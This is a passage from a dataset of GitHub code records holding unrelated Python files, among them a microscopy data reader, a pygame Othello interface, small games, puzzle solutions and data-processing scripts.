'SpecParamT4us:'+meta[i+5]\n\n # Split list into pairs\n meta = [e.split(':',1) for e in meta]\n\n # Create dictionary for metadata\n meta = {k:v for k,v in meta}\n\n # Adjust date as YYYY-MM-DD and time as HH:MM\n year = '20'+meta['Date'][6:8]\n month = meta['Date'][3:5]\n day = meta['Date'][0:2]\n hours = meta['Date'][8:10]\n seconds = meta['Date'][11:13]\n\n meta['Time'] = hours+':'+seconds\n meta['Date'] = year+'-'+month+'-'+day\n\n # Calculate timestamp in seconds\n timeStamp = meta['Date']+'T'+meta['Time']+\":00\"\n meta['Timestamp'] = timeStamp\n\n return meta\n\n def _loadData(self):\n \"\"\"Load data from .par file into a numpy array\n \n Returns: multidimensional numpy array\n \n \"\"\"\n\n # Initialize data array\n xsize = int(self._meta['ImageSizeinX'])\n ysize = int(self._meta['ImageSizeinY'])\n data = list()\n\n # Cycle over image channels\n for i, chPrefix in enumerate(self._imglist):\n chFile = self._meta[chPrefix+'Filename']\n # Load data from current channel\n data.append(np.resize(np.fromfile(os.path.join(self._path, chFile),dtype='>i2'), (xsize, ysize)))\n\n # Return data\n return data\n\n def _addChannels(self):\n\n channels = list()\n\n for i, chName in enumerate(self._imglist):\n\n data = self._data[i]\n attrs = dict()\n for k,v in self._meta.items():\n if chName in k:\n key = k.replace(chName, '')\n if key in ['MinimumRawValue', 'MaximumRawValue', 'NumberSpecPoints']:\n attrs[key] = int(v)\n elif key in ['MinimumPhysValue', 'MaximumPhysValue', 'Resolution',\n 'StartPoint', 'EndPoint', 'Increment', 
'AcqTimePerPoint', 'DelayTimePerPoint']:\n attrs[key] = float(v)\n else:\n attrs[key] = v\n attrs.pop(\"Filename\")\n\n channel = OMICRONchannel(data, {**attrs, **self._globAttrs()})\n channels.append(channel)\n\n return channels\n\n def _globAttrs(self):\n\n attrs = self._meta.copy()\n\n for i, chName in enumerate(self._chlist):\n for k,v in self._meta.items():\n if chName in k:\n del attrs[k]\n\n float_keys = ['FieldXSizeinnm',\n 'FieldYSizeinnm',\n 'IncrementX',\n 'IncrementY',\n 'ScanAngle',\n 'XOffset',\n 'YOffset',\n 'GapVoltage',\n 'FeedbackSet',\n 'LoopGain',\n 'XResolution',\n 'YResolution',\n 'ScanSpeed',\n 'XDrift',\n 'YDrift',\n 'TopographyTimeperPoint',\n 'ZSpeed',\n 'ZOutputGain',\n 'ZInputGain']\n int_keys = ['Format',\n 'ImageSizeinX',\n 'ImageSizeinY',\n 'SpectroscopyGridValueinX',\n 'SpectroscopyGridValueinY',\n 'SpectroscopyPointsinX',\n 'SpectroscopyLinesinY',\n 'SpecParamT1us',\n 'SpecParamT2us',\n 'SpecParamT3us',\n 'SpecParamT4us']\n\n for k,v in attrs.items():\n if k in float_keys:\n attrs[k] = float(v)\n elif k in int_keys:\n attrs[k] = int(v)\n\n return attrs\n\nclass OMICRONchannel:\n \n def __init__(self, data, attrs):\n \n self.data = data\n self.attrs = attrs\n\n if self.attrs['TopographicChannel'] == \"Z\":\n channel = \"Topography\"\n elif self.attrs['TopographicChannel'] == \"I\":\n channel = \"Current\"\n else:\n channel = self.attrs['TopographicChannel']\n self.label = channel + \"_\" + self.attrs['Direction']\n\n xsize = self.attrs['ImageSizeinX']\n xres = self.attrs['IncrementX']\n ysize = self.attrs['ImageSizeinY']\n yres = self.attrs['IncrementY']\n self.coords = [('y', yres * np.arange(ysize, dtype=float)),\n ('x', xres * np.arange(xsize, dtype=float))]\n","repo_name":"rescipy-project/spym","sub_path":"spym/io/omicronscala/_scala.py","file_name":"_scala.py","file_ext":"py","file_size_in_byte":8611,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"17917115219","text":"from openpipeAPI.ORM.ORM import ORM\nfrom openpipeAPI.ORM.TO import TO\n\ntables = TO().getClasses()\norm = ORM()\ndata=orm.executeSelect(\"select a.id,artist_tags.topic_id from (SELECT * FROM artmaster.metaTag where tagName='openpipe_canonical_artist') as a join artist_tags on a.value=artist_tags.value\")\nMetaTag = tables[\"metaTag\"]\nfor d in data[\"data\"]:\n orm.session.query(MetaTag).filter(MetaTag.id == int(d[\"id\"][0])).update({\"topic_name\": \"artist\", \"topic_id\": int(d[\"topic_id\"][0])})\norm.commitClose()\n","repo_name":"MEC402/openpipe","sub_path":"backend/openpipeAPI/ReverseGUID.py","file_name":"ReverseGUID.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"32330552242","text":"import pygame, sys, time, os\r\nfrom pygame.locals import *\r\nimport time\r\nfrom variables import azul, blanco, dificultad, humano, computadora\r\n\r\nclass Graphics:\r\n\r\n def __init__(self):\r\n pygame.init()\r\n\r\n self.negro = (0, 0, 0)\r\n self.morado = (216, 191, 216)\r\n self.blanco = (255, 255, 255)\r\n self.azul = (0, 0, 205)\r\n\r\n self.screensize = (640, 480)\r\n self.posiciontablero = (100, 20)\r\n self.tablero = (120, 40)\r\n self.tablerotamano = 400\r\n self.espaciotamano = 50\r\n self.screen = pygame.display.set_mode(self.screensize)\r\n self.azulpalabrapos = (5, self.screensize[1] / 4)\r\n self.blancopalabrapos = (560, self.screensize[1] / 4)\r\n self.font = pygame.font.SysFont(\"Courier-Bold\", 22)\r\n 
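# Geometry note: tablerotamano (400) is 8 * espaciotamano (50), so the grid is 8x8 cells of 50 px; 'tablero' (120, 40) marks the pixel origin of cell (0, 0), offset 20 px inside the board image drawn at 'posiciontablero' (100, 20). The PNG/JPEG assets loaded here are assumed to live in the working directory.\r\n 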
self.puntuacionfont = pygame.font.SysFont(\"TrebuchetMS\", 58)\r\n self.tableroimg = pygame.image.load('tablero.png')\r\n self.azulimg = pygame.image.load('ficha azul.png')\r\n self.blancoimg = pygame.image.load('ficha blanca.png')\r\n self.tipimg = pygame.image.load('ficha tips.png')\r\n self.vacioimg = pygame.image.load('cuadrado amarillo.png')\r\n self.animacion1img = pygame.image.load('animacion 1.png')\r\n self.animacion2img = pygame.image.load('animacion 2.png')\r\n\r\n def mostraropciones(self):\r\n jugador1 = humano\r\n jugador2 = computadora\r\n nivel = dificultad\r\n\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier-Bold\", 34)\r\n titulo = titulofont.render(\"Othello\", True, self.blanco)\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2, centery=60)\r\n\r\n comenzartexto= self.font.render(\"Comenzar\", True, self.blanco)\r\n comenzarposicion = comenzartexto.get_rect(centerx=self.screen.get_width() / 2, centery=220)\r\n jugador1texto = self.font.render(\"Primer jugador \", True, self.blanco)\r\n jugador1pos = jugador1texto.get_rect(centerx=self.screen.get_width() / 2, centery=260)\r\n jugador2texto = self.font.render(\"Segundo jugador \", True, self.blanco)\r\n jugador2pos = jugador2texto.get_rect(centerx=self.screen.get_width() / 2, centery=300)\r\n niveltexto = self.font.render(\"Nivel de computadora \", True, self.blanco)\r\n nivelpos = niveltexto.get_rect(centerx=self.screen.get_width() / 2, centery=340)\r\n humanotexto = self.font.render(\"Humano\", True, self.blanco)\r\n computadoratexto = self.font.render(\"Computadora\", True, self.blanco)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(comenzartexto, comenzarposicion)\r\n self.screen.blit(jugador1texto, jugador1pos)\r\n self.screen.blit(jugador2texto, jugador2pos)\r\n self.screen.blit(niveltexto, nivelpos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if comenzarposicion.collidepoint(mouse_x, mouse_y):\r\n return jugador1, jugador2, nivel\r\n elif jugador1pos.collidepoint(mouse_x, mouse_y):\r\n jugador2 = self.elegirjugador()\r\n elif jugador2pos.collidepoint(mouse_x, mouse_y):\r\n jugador2 = self.elegirjugador()\r\n elif nivelpos.collidepoint(mouse_x, mouse_y):\r\n nivelpos = self.elegirnivel()\r\n\r\n pygame.display.flip()\r\n\r\n def mostrarganador(self, colorjugador):\r\n self.screen.fill(pygame.Color(0, 0, 0, 50))\r\n font = pygame.font.SysFont(\"Courier-Bold\", 34)\r\n if colorjugador == blanco:\r\n msg = font.render(\"Blanco ganó\", True, self.blanco)\r\n elif colorjugador == azul:\r\n msg = font.render(\"Azul ganó\", True, self.blanco)\r\n else:\r\n msg = font.render(\"Empate\", True, self.blanco)\r\n self.screen.blit(msg, msg.get_rect(centerx=self.screen.get_width() / 2, centery=120))\r\n pygame.display.flip()\r\n\r\n def elegirjugador(self):\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier\", 34)\r\n titulo = titulofont.render(\"Othello\", True, Color(0, 0, 205))\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2,centery=60)\r\n humanotexto = self.font.render(\"Humano\", True, self.blanco)\r\n humanopos = humanotexto.get_rect(centerx=self.screen.get_width() / 2, centery=120)\r\n computadoratexto = self.font.render(\"Computer\", True, self.blanco)\r\n computadorapos = computadoratexto.get_rect(centerx=self.screen.get_width() / 
2,centery=360)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(humanotexto, humanopos)\r\n self.screen.blit(computadoratexto, computadorapos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if humanopos.collidepoint(mouse_x, mouse_y):\r\n return humano\r\n elif computadorapos.collidepoint(mouse_x, mouse_y):\r\n return computadora\r\n pygame.display.flip()\r\n\r\n def elegirnivel(self):\r\n while True:\r\n self.screen.fill(self.morado)\r\n titulofont = pygame.font.SysFont(\"Courier\", 34)\r\n titulo = titulofont.render(\"Othello\", True, self.azul)\r\n tituloposicion = titulo.get_rect(centerx=self.screen.get_width() / 2,centery=60)\r\n unotexto = self.font.render(\"Nivel 1\", True, self.blanco)\r\n unopos = unotexto.get_rect(centerx=self.screen.get_width() / 2,centery=120)\r\n dostexto = self.font.render(\"Nivel 2\", True, self.blanco)\r\n dospos = dostexto.get_rect(centerx=self.screen.get_width() / 2,centery=240)\r\n trestexto = self.font.render(\"Nivel 3\", True, self.blanco)\r\n trespos = trestexto.get_rect(centerx=self.screen.get_width() / 2,centery=360)\r\n\r\n self.screen.blit(titulo, tituloposicion)\r\n self.screen.blit(unotexto, unopos)\r\n self.screen.blit(dostexto, dospos)\r\n self.screen.blit(trestexto, trespos)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n if unopos.collidepoint(mouse_x, mouse_y):\r\n return 1\r\n elif dospos.collidepoint(mouse_x, mouse_y):\r\n return 2\r\n elif trespos.collidepoint(mouse_x, mouse_y):\r\n return 3\r\n\r\n pygame.display.flip()\r\n time.sleep(.05)\r\n\r\n def mostrarjuego(self):\r\n self.background = pygame.Surface(self.screen.get_size()).convert()\r\n self.background.fill(self.morado)\r\n self.puntajetamano = 50\r\n self.puntaje1 = pygame.Surface((self.puntajetamano, self.puntajetamano))\r\n self.puntaje2 = pygame.Surface((self.puntajetamano, self.puntajetamano))\r\n self.screen.blit(self.background, (0, 0), self.background.get_rect())\r\n self.screen.blit(self.tableroimg, self.posiciontablero, self.tableroimg.get_rect())\r\n self.ponerpieza((3, 3), blanco)\r\n self.ponerpieza((4, 4), blanco)\r\n self.ponerpieza((3, 4), azul)\r\n self.ponerpieza((4, 3), azul)\r\n pygame.display.flip()\r\n\r\n def ponerpieza(self, pos, color):\r\n if pos == None:\r\n return\r\n pos = (pos[1], pos[0])\r\n if color == azul:\r\n img = self.azulimg\r\n elif color == blanco:\r\n img = self.blancoimg\r\n else:\r\n img = self.tipimg\r\n\r\n x = pos[0] * self.espaciotamano + self.tablero[0]\r\n y = pos[1] * self.espaciotamano + self.tablero[1]\r\n\r\n self.screen.blit(img, (x, y), img.get_rect())\r\n pygame.display.flip()\r\n\r\n def espaciovacio(self, pos):\r\n pos = (pos[1], pos[0])\r\n x = pos[0] * self.espaciotamano + self.tablero[0]\r\n y = pos[1] * self.espaciotamano + self.tablero[1]\r\n self.screen.blit(self.vacioimg, (x, y), self.vacioimg.get_rect())\r\n pygame.display.flip()\r\n\r\n def movimientomouse(self):\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == MOUSEBUTTONDOWN:\r\n (mouse_x, mouse_y) = pygame.mouse.get_pos()\r\n if mouse_x > self.tablerotamano + self.tablero[0] or \\\r\n mouse_x < self.tablero[0] or \\\r\n mouse_y > self.tablerotamano + self.tablero[1] or \\\r\n mouse_y < self.tablero[1]:\r\n continue\r\n\r\n posicion = ((mouse_x - self.tablero[0]) // 
self.espaciotamano), \\\r\n ((mouse_y - self.tablero[1]) // self.espaciotamano)\r\n posicion = (posicion[1], posicion[0])\r\n return posicion\r\n elif event.type == QUIT:\r\n sys.exit(0)\r\n time.sleep(.05)\r\n\r\n def update(self, tablero, azules, blancos):\r\n for f in range(8):\r\n for c in range(8):\r\n if tablero[f][c] != 0:\r\n self.ponerpieza((f, c), tablero[f][c])\r\n\r\n azulesstr = '%02d ' % int(azules)\r\n blancosstr = '%02d ' % int(blancos)\r\n self.mostrarpuntaje(azulesstr, blancosstr)\r\n pygame.display.flip()\r\n\r\n def mostrarpuntaje(self, azulstr, blancostr):\r\n texto = self.puntuacionfont.render(azulstr, True, self.azul, self.morado)\r\n texto1 = self.puntuacionfont.render(blancostr, True, self.blanco, self.morado)\r\n self.screen.blit(texto, (self.azulpalabrapos[0], self.azulpalabrapos[1] + 40))\r\n self.screen.blit(texto1, (self.blancopalabrapos[0], self.blancopalabrapos[1] + 40))\r\n\r\n def quit(self):\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit(0)\r\n elif event.type == KEYDOWN:\r\n break\r\n\r\n","repo_name":"tamaraortizr/boardgame","sub_path":"graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":10548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12138338791","text":"#! /usr/bin/env python3\nimport glob\nimport re\nimport sys\nfrom collections import defaultdict\nfrom math import log\n\n# artist_pro{key=artist,value=[frequency1,frequency2...]}\nartist_pro = defaultdict(list)\nfor single_word in sys.argv[1:]:\n for file in glob.glob(\"lyrics/*.txt\"):\n with open(file, 'r') as fp:\n total_words = 0\n Word = single_word.capitalize()\n occur_time = 0\n for lines in fp:\n number = re.findall(r'[a-zA-Z]+', lines)\n total_words += len(number)\n line = re.findall(r'[a-zA-Z]+', lines)\n occur_time += line.count(single_word)\n if Word != single_word:\n occur_time += line.count(Word)\n if single_word.upper() != Word:\n occur_time += line.count(single_word.upper())\n \n # frequency = (int(occur_time) + 1) / int(total_words)\n filename = []\n for string in file:\n filename.append(string)\n not_real_filename = ''.join(filename[7:-4])\n real_filename = not_real_filename.replace('_', ' ')\n artist_pro[real_filename].append((int(occur_time) + 1) / int(total_words))\n # artist_pro[real_filename].append(frequency)\n\nfor key, value in artist_pro.items():\n temp_list = []\n for index in range(len(value)):\n temp_list.append(log(value[index]))\n total = sum(temp_list)\n artist_pro[key].append(total)\n\nsort_dic = sorted(artist_pro.items(), key=lambda x: x[0])\nfor item in sort_dic:\n print(f'{item[1][-1]:10.5f} {item[0]}')\n\n\n","repo_name":"junbaic/COMP9044","sub_path":"lab exercise/lab08/lyrics/log_probability.py","file_name":"log_probability.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38876379408","text":"class Solution:\n def numberOfSpecialSubstrings(self, s: str) -> int:\n d = defaultdict(int)\n total = 0\n l = 0\n\n for r in range(len(s)):\n d[s[r]] += 1\n\n while d[s[r]] > 1:\n d[s[l]] -= 1\n l += 1\n total += r - l + 1\n return total\n","repo_name":"kai3n/Daily-commit-project","sub_path":"jamespak/week35/2743. 
Count Substrings Without Repeating Character.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"47038681308","text":"import tkinter as tk\r\nfrom random import randint\r\nfrom tkinter import Label, ttk\r\nroot=tk.Tk()\r\n#root.iconbitmap('rpc.ico')\r\nroot.config(bg=\"white\")#change background color to gray\r\nrock= tk.PhotoImage(file='D:/MCA/Projects/rock.jpeg')\r\npaper= tk.PhotoImage(file='D:/MCA/Projects/p.png')\r\nscissor=tk.PhotoImage(file='D:/MCA/Projects/sci.jpeg')\r\n#add image to a list\r\nimage_list=[rock,paper,scissor]\r\n#pick random number between 0 and 2\r\npick_number=randint(0,2)\r\nimage_label= tk.Label(root,image=image_list[pick_number], bd=0)\r\nimage_label.pack(pady=20)\r\n#create spin funtion\r\ndef spin():\r\n #pick random number\r\n pick_number=randint(0,2)\r\n #show image\r\n image_label.config(image=image_list[pick_number])\r\n # 0- rock\r\n # 1- paper\r\n # 2- scissor\r\n #convert dropdown choice to a number\r\n if user_choice.get()== \"Rock\":\r\n user_choice_value=0\r\n elif user_choice.get()==\"Paper\":\r\n user_choice_value=1\r\n else:\r\n user_choice_value=2\r\n #determine if we won or lost\r\n if user_choice_value==0:\r\n if pick_number ==0:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==1:\r\n win_lose_label.config(text=\"Paper covers rock! You loose...\")\r\n elif pick_number==2:\r\n win_lose_label.config(text=\"Rock can break scissor! You win...\")\r\n if user_choice_value==1:\r\n if pick_number ==1:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==2:\r\n win_lose_label.config(text=\"Scissor cuts paper! You loose...\")\r\n elif pick_number==0:\r\n win_lose_label.config(text=\"Paper covers rock! You win...\")\r\n if user_choice_value==2:\r\n if pick_number ==2:\r\n win_lose_label.config(text=\"It's a tie! Spin again...\")\r\n elif pick_number==0:\r\n win_lose_label.config(text=\"Rock smash scissor! You loose...\")\r\n elif pick_number==1:\r\n win_lose_label.config(text=\"Scissor cuts paper! 
You win...\")\r\n# create choice\r\nuser_choice=ttk.Combobox(root,value=(\"Rock\",\"Paper\",\"Scissor\"))\r\nuser_choice.current(0)\r\nuser_choice.pack(pady=20)\r\n#create spin button\r\nspin_button=tk.Button(root,text=\"spin!\",command=spin)\r\nspin_button.pack(pady=10)\r\n# label for result\r\nwin_lose_label=Label(root,text=\"\",font=(\"Helvetica\",18))\r\nwin_lose_label.pack(pady=50)\r\nroot.mainloop()","repo_name":"ashwini17055570009/stonePaperScissor","sub_path":"stonePaperSissor.py","file_name":"stonePaperSissor.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36136364169","text":"import argparse\nimport os\nimport sys\nimport copy\n\nfrom pero_ocr.document_ocr.layout import PageLayout\n\n\ndef parse_arguments():\n print(' '.join(sys.argv))\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--data\", required=True, type=str, help=\"Path to a folder containing xml data.\")\n parser.add_argument(\"--out\", required=True, type=str, help=\"Path to a folder to save output.\")\n\n args = parser.parse_args()\n return args\n\n\ndef filter_lines(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n for region in _pagexml.regions:\n region.lines = [line for line in region.lines if line.transcription.strip() or line.transcription.strip() != \"\"]\n\n return _pagexml\n\n\ndef filter_regions(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n _pagexml.regions = [region for region in pagexml.regions if \\\n len(region.lines) > 0 \\\n and not (len(region.lines) == 1 and len(region.lines[0].transcription.strip()) < 5) \\\n and not all(line.transcription.strip().isdigit() for line in region.lines)]\n\n return _pagexml\n\n\ndef filter_pagelayout(pagexml: PageLayout) -> PageLayout:\n _pagexml = copy.copy(pagexml)\n\n _pagexml = filter_lines(_pagexml)\n _pagexml = filter_regions(_pagexml)\n\n return _pagexml\n\n\ndef main(args):\n for filename in os.listdir(args.data):\n if not filename.endswith(\".xml\"):\n continue\n\n path = os.path.join(args.data, filename)\n pagexml = PageLayout(file=path)\n pagexml = filter_pagelayout(pagexml)\n\n out_path = os.path.join(args.out, filename)\n pagexml.to_pagexml(file_name=out_path)\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n main(args)\n","repo_name":"Faz0lek/textbite","sub_path":"textbite/pagexml/filter_xml.py","file_name":"filter_xml.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39269396478","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nDATA_FOLDER = \"./data/\"\nSUBSET = 0.01\ndata = pd.read_csv(f\"{DATA_FOLDER}vector-0.01.csv\")\nmapping = pd.read_csv(f\"{DATA_FOLDER}mapping-{SUBSET}.csv\", sep=\",\")\n\n\ndef get_vectors(data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Return a dataframe with the data vectors based on the mapping\"\"\"\n dummies = pd.get_dummies(mapping.ingredient)\n\n def convert_to_vectors(row):\n ingredient_list = row[\"NER\"]\n vector_list = [np.expand_dims(dummies[i].values, axis=0) for i in ingredient_list]\n return np.concatenate(vector_list, axis=0).sum(axis=0, keepdims=True)\n \n vectors = data.apply(convert_to_vectors, axis=1)\n vectors = np.concatenate(vectors.values.tolist(), axis=0)\n\n return pd.DataFrame(data=vectors, columns=mapping.ingredient.values, 
index=data[\"title\"]).reset_index()\n\ndef topk(vector: pd.DataFrame, k: int = 5) -> pd.DataFrame:\n vector = vector.iloc[:, 1:].values\n sim = cosine_similarity(vector, data.iloc[:, 1:].values)\n topk = (-sim).argsort()[:, :k]\n\n sim_scores = sim[:, topk[0]][0]\n meals = data.iloc[topk[0]][\"title\"].values\n ingredients = data.iloc[topk[0], 1:]\n\n diff = ingredients.values - vector\n missing_list = []\n for i in range(len(diff)):\n missing = np.where(diff[i] == 1)[0]\n missing_list.append(missing)\n\n scores = sim_scores - np.array([len(m) * 0.1 for m in missing_list])\n res = pd.DataFrame(dict(name=meals, sim_score=sim_scores, score=scores, missing_id=missing_list))\n res = res.sort_values(by=\"score\", ascending=False).reset_index(drop=True)\n\n return res\n\ndef missing_names(missing_list: list):\n names = [\n mapping.iloc[missing].ingredient.values\n for missing in missing_list\n ]\n return names\n","repo_name":"AntoineBlanot/papAIa","sub_path":"api/recom.py","file_name":"recom.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12138895621","text":"# Insert your code here\nfile_name = input('Which data file do you want to use? ')\nlist_rectangle1, list_x, list_y = [], [], []\nwith open(f'{file_name}', 'r') as file:\n for line_items in file:\n for x in line_items.strip().split():\n x1, x2 = int((line_items.strip().split())[0]), int((line_items.strip().split())[2])\n y1, y2 = int((line_items.strip().split())[1]), int((line_items.strip().split())[3])\n list_rectangle1.append((x1, y1, x2, y2))\n list_x.append(x1)\n list_x.append(x2)\n list_y.append(y1)\n list_y.append(y2)\nsort_list_x = sorted(set(list_x))\nsort_list_y = sorted(set(list_y))\nprint(sort_list_x)\nprint(sort_list_y)\nrect_top, rect_bottom, rect_left, rect_right = {}, {}, {}, {}\nfor item in list_rectangle1:\n rect_top[item] = ((item[0], item[3]), (item[2], item[3]))\n rect_bottom[item] = ((item[0], item[1]), (item[2], item[1]))\n rect_left[item] = ((item[0], item[1]), (item[0], item[3]))\n rect_right[item] = ((item[2], item[1]), (item[2], item[3]))\nx_perimeter, y_perimeter = 0, 0\ncondition = [0, 0]\nfor index_y in range(1, len(sort_list_y)):\n for x in sort_list_x:\n for left_rect, right_rect in zip(rect_left.keys(), rect_right.keys()):\n if sort_list_y[index_y] > rect_left[left_rect][0][1]:\n if sort_list_y[index_y] <= rect_left[left_rect][1][1]:\n if x == rect_left[left_rect][1][0]:\n if condition[0] < 1:\n y_perimeter = y_perimeter + (sort_list_y[index_y] - sort_list_y[index_y - 1])\n condition[0] = condition[0] + 1\n if sort_list_y[index_y] > rect_right[right_rect][0][1]:\n if sort_list_y[index_y] <= rect_right[right_rect][1][1]:\n if x == rect_right[right_rect][1][0]:\n condition[0] -= 1\n if condition[0] < 1:\n y_perimeter = y_perimeter + (sort_list_y[index_y] - sort_list_y[index_y - 1])\nprint(y_perimeter)\nfor index_x in range(1, len(sort_list_x)):\n for y in sort_list_y:\n for bottom_points, top_points in zip(rect_bottom.values(), rect_top.values()):\n if sort_list_x[index_x] > bottom_points[0][0]:\n if sort_list_x[index_x] <= bottom_points[1][0]:\n if y == bottom_points[1][1]:\n if condition[1] < 1:\n x_perimeter = x_perimeter + (sort_list_x[index_x] - sort_list_x[index_x - 1])\n condition[1] = condition[1] + 1\n if sort_list_x[index_x] > top_points[0][0]:\n if sort_list_x[index_x] <= top_points[1][0]:\n if y == top_points[1][1]:\n condition[1] = condition[1] - 1\n if condition[1] < 1:\n x_perimeter = 
x_perimeter + (sort_list_x[index_x] - sort_list_x[index_x - 1])\nprint(x_perimeter)\nprint('The perimeter is:', x_perimeter + y_perimeter)\n\n\n\n","repo_name":"junbaic/COMP9021","sub_path":"Assignment/assignment1/perimeter.py","file_name":"perimeter.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10511725380","text":"# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\n# Example:\n\n# Input: [0,1,0,3,12]\n# Output: [1,3,12,0,0]\n# Note:\n\n# You must do this in-place without making a copy of the array.\n# Minimize the total number of operations.\n\n# Just like bubble sort, instead of greater than or less than numbers. Its numbers that are 0 or not 0.\ndef moveZeroes(self, nums: List[int]) -> None:\n zero = 0\n for non_zero in range(len(nums)):\n if nums[non_zero] == 0:\n continue\n \n nums[zero], nums[non_zero] = nums[non_zero], nums[zero]\n\n zero += 1\n\n# Time: O(n) | Space: O(1)\n\n# left = 0\n# right = left + 1\n\n# while right < len(nums) - 1:\n# if nums[left] == 0 and nums[right] == 0:\n# right += 1\n \n# if nums[left] == 0:\n# print('yes')\n# if nums[right] != 0:\n# self.swap(nums, left, right)\n# else:\n# right += 1\n# else:\n# left += 1\n# return nums\n \n# def swap(self, nums, left, right):\n# nums[left], nums[right] = nums[right], nums[left]","repo_name":"chris510/Coding-Problems","sub_path":"python/array/283_movezeroes.py","file_name":"283_movezeroes.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73709800852","text":"#!/usr/bin/env python3\n\n# from pprint import pprint\nimport re\n\nfrom falala import tada\n\nwith open(\"input\", \"r\") as f:\n input = f.read().splitlines()\n\nbag_rules = dict()\n\nfor i in input:\n simplified = (\n i.replace(\" contain\", \",\")\n .replace(\" bags.\", \"\")\n .replace(\" bag.\", \"\")\n .replace(\" bags\", \"\")\n .replace(\" bag\", \"\")\n .replace(\" no other\", \"\")\n )\n simplified = simplified.split(\",\")\n\n holder, *holdees = simplified\n\n holdee_tuples = []\n for h in holdees:\n if h != \"\":\n h = h.lstrip().split(\" \")\n quantity = int(h[0])\n which_type = \"_\".join(h[1:])\n parsed = (quantity, which_type)\n holdee_tuples.append(parsed)\n\n holder = holder.replace(\" \", \"_\")\n bag_rules[holder] = holdee_tuples\n\n# ok, finally we have the rules, this time with counts\n\n# just curious\n# terminal_bags = [ k for k,v in bag_rules.items() if v == []]\n# print(\"Bags of no holding:\")\n# pprint(terminal_bags)\n\nrunning_tally = 0\n\n\ndef tally_bags_within(bag):\n global running_tally\n rule = bag_rules[bag]\n\n # create list of next-level bags to check\n inner_bags = []\n for r in rule:\n running_tally += r[0]\n inner_bags.extend([r[1]] * r[0])\n\n # keep checking those bags - pun intended.\n for b in inner_bags:\n tally_bags_within(b)\n\n\n# do the thing\ntally_bags_within(\"shiny_gold\")\n\ntada(f\"Wow: a single shiny gold bag holds {running_tally} inner bags. 
😜\")\n","repo_name":"knoxilla/advent-of-code","sub_path":"2020/7/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20876924841","text":"'''\nN과 M (2)\nhttps://www.acmicpc.net/problem/15650\n백준 실버3 15650\n\n자연수 N과 M이 주어졌을 때, 아래 조건을 만족하는 길이가 M인 수열을 모두 구하는 프로그램을 작성하시오.\n\n1부터 N까지 자연수 중에서 중복 없이 M개를 고른 수열\n고른 수열은 오름차순이어야 한다.\n'''\n\n\nN, M = map(int, input().split())\narr = [0]*M\n\ndef f(i, M):\n if i == M:\n print(*arr)\n return\n for m in range(1, N+1):\n if m not in arr and (i == 0 or arr[i-1] < m):\n arr[i] = m\n f(i+1, M)\n arr[i] = 0\nf(0, M)","repo_name":"seoda0000/TIL","sub_path":"AlgorithmProblemSolving/04_백준/Silver/15650_N과_M_2.py","file_name":"15650_N과_M_2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"13392790840","text":"######### Utility functions for S3DIS dataset\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport sys\nimport scipy.io as scio\nimport pathlib\n\n# 